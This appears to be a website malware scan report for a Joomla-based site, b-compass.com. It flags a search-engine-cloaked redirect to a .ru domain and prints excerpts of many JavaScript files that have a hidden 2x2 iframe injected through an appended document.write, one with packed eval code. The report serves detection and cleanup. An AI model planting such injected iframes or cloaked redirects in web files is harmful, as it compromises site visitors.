Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://b-compass.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: b-compass.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 19:39:30 GMT Location: http://accordinglycoaxes.ru/artgallery?8 Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://b-compass.com/ | 200 OK Content-Length: 19564 Content-Type: text/html | clean |
http://b-compass.com/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?compress=1 | 200 OK Content-Length: 46824 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('A m={11:{8w:\'aM\',aV:\'dD...\',aN:\'9f 1U dC\',bh:\'9f 1U dB 1U dz\',8N:\'dA 1U dE H (f)\',cc:\'dF by <i>9S a3</i>\',cd:\'dJ 1U dI 9S a3 dG\',8u: document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://b-compass.com/plugins/system/cdscriptegrator/libraries/jquery/js/jsloader.php?compress=1 | 200 OK Content-Length: 57536 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://b-compass.com/plugins/system/cdscriptegrator/libraries/jquery/js/ui/jsloader.php?compress=1&file=ui.core | 200 OK Content-Length: 14062 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;jQuery.ui || (function($) { var _remove = $.fn.remove, isFF2 = $.browser.mozilla && (parseFloat($.browser.version) < 1.9); $.ui = { version: "1.7.1", plugin: { add: function(module, option, set) { var proto = $.ui[module].prototype; for(var i in set) { proto.plugins[i] = proto.plugins[i] || []; proto.plugins[i].push([option, set[i]]); } }, call: function(instance, name, args) { var set = instance.pl return this.mouseDelayMet; }, _mouseStart: function(event) {}, _mouseDrag: function(event) {}, _mouseStop: function(event) {}, _mouseCapture: function(event) { return true; } }; $.ui.mouse.defaults = { cancel: null, distance: 1, delay: 0 }; })(jQuery); document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://b-compass.com/media/system/js/modal.js | 200 OK Content-Length: 10718 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var SqueezeBox = { presets: { size: {x: 600, y: 450}, sizeLoading: {x: 200, y: 150}, marginInner: {x: 20, y: 20}, marginImage: {x: 150, y: 200}, handler: false, adopt: null, closeWithOverlay: true, zIndex: 65555, overlayOpacity: 0.7, classWindow: '', classOverlay: '', disableFx: false, onOpen: Class.empty, onClose: Class.empty, onUpdate: Class.empty, onResize: Class.empty, onMove: Class.emp 'width': this.options.size.x, 'height': this.options.size.y }); }, 'string': function(str) { return str; } }, extend: $extend }; SqueezeBox.extend(SqueezeBox, Events.prototype); SqueezeBox.extend(SqueezeBox, Options.prototype); SqueezeBox.extend(SqueezeBox, Chain.prototype);document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://b-compass.com/components/com_k2/js/k2.js | 200 OK Content-Length: 3157 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('domready', function(){ if ($('comment-form')) { $('comment-form').addEvent('submit', function(e){ new Event(e).stop(); var log2 = $('formLog').empty().addClass('formLogLoading'); this.send({ update: log2, onComplete: function(res){ log2.removeClass('formLogLoading'); if(typeof(Recaptcha) != "undefined"){ Recaptcha.reload(); } if (res.substr(13, 7 }); }); window.addEvent('load', function(){ if($$('.subCategory')){ var blocks = $$('.subCategory'); var maxHeight = 0; blocks.each(function(item){ maxHeight = Math.max(maxHeight, parseInt(item.getStyle('height'))); }); blocks.setStyle('height', maxHeight); } }); document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://b-compass.com/media/system/js/caption.js | 200 OK Content-Length: 2093 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://b-compass.com/modules/mod_gk_news_highlighter/scripts/engine_compress.js | 200 OK Content-Length: 4906 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent("domready",function(){Fx.Height=Fx.Style.extend({initialize:function(a,b){$(a).setStyle('overflow','hidden');this.parent(a,'height',b)},toggle:function(){var a=this.element.getStyle('height').toInt();return this.start((a>0)?(a,0):(0,this.element.scrollHeight))},show:function(){return this.set(this.element.scrollHeight)}});Fx.Opacity=Fx.Style.extend({initialize:function(a,b){this.now=1;this.parent(a,'opacity',b)},toggle:function(){return this.start((this.now>0)?(1,0):(0,1))} Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://b-compass.com/modules/mod_gk_news_highlighter/scripts/importer.php?module_id=news-highlight-1&animation_type=1&animation_speed=250&animation_interval=3500&animation_fun=Fx.Transitions.linear&mouseover=1 | 200 OK Content-Length: 240 Content-Type: text/javascript | clean |
http://b-compass.com/modules/mod_flashmod/mod_flashmod.js | 200 OK Content-Length: 3906 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; } function AC_Generateobj(objAttrs, params, embedAttrs) { var str = '<object '; for (var i in objAttrs) str += i + '="' + objAttrs[i] + '" '; str += '>'; for (var i in params) str += '<param name="' + i + '" value="' + params[i] + '" /> '; str + ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://b-compass.com/templates/ja_topaz/js/ja.script.js | 200 OK Content-Length: 13999 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function switchFontSize (ckname,val){ var bd = $E('body'); switch (val) { case 'inc': if (CurrentFontSize+1 < 7) { bd.removeClass('fs'+CurrentFontSize); CurrentFontSize++; bd.addClass('fs'+CurrentFontSize); } break; case 'dec': if (CurrentFontSize-1 > 0) { bd.removeClass('fs'+CurrentFontSize); CurrentFontSize--; bd.addClass('fs'+CurrentFontSize); } break; default button.addEvent ('click', function() { var h = this._status?0:(this.el.scrollHeight-20); this.fx.start (h); this._status = !this._status; this.setText (this._alt); this._alt = this.title; this.title = this.getText(); return false; }); } }document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://b-compass.com/templates/ja_topaz/ja_menus/ja_moomenu/ja.moomenu.js | 200 OK Content-Length: 5651 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(MooTools) != 'undefined'){ var subnav = new Array(); Element.extend( { hide: function(timeout) { this.status = 'hide'; clearTimeout (this.timeout); if (timeout) { this.timeout = setTimeout (this.anim.bind(this), timeout); }else{ this.anim(); } }, show: function(timeout) { this.status = 'show'; clearTimeo sfEls[i].onmouseover=function() { this.className+="sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp("sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); } document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://b-compass.com/index.php?option=com_content&view=article&id=196:abertas-candidaturas-aos-sistemas-de-incentivos-as-empresas-do-qren&catid=50:destaques&Itemid=108 | 200 OK Content-Length: 25873 Content-Type: text/html | clean |
http://b-compass.com/index.php?option=com_content&view=article&id=188:abertas-candidaturas-aos-sistemas-de-incentivos-as-empresas-do-qren&catid=50:destaques&Itemid=108 | 200 OK Content-Length: 26645 Content-Type: text/html | clean |
http://b-compass.com/index.php?option=com_content&view=article&id=143:artigo-qcriterios-de-avaliacao-para-areas-urbanas-sustentaveisq&catid=50:destaques&Itemid=108 | 200 OK Content-Length: 26070 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=b-compass.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://b-compass.com/
Result: b-compass.com is not infected or malware details are not published yet.
Result: b-compass.com is not infected or malware details are not published yet.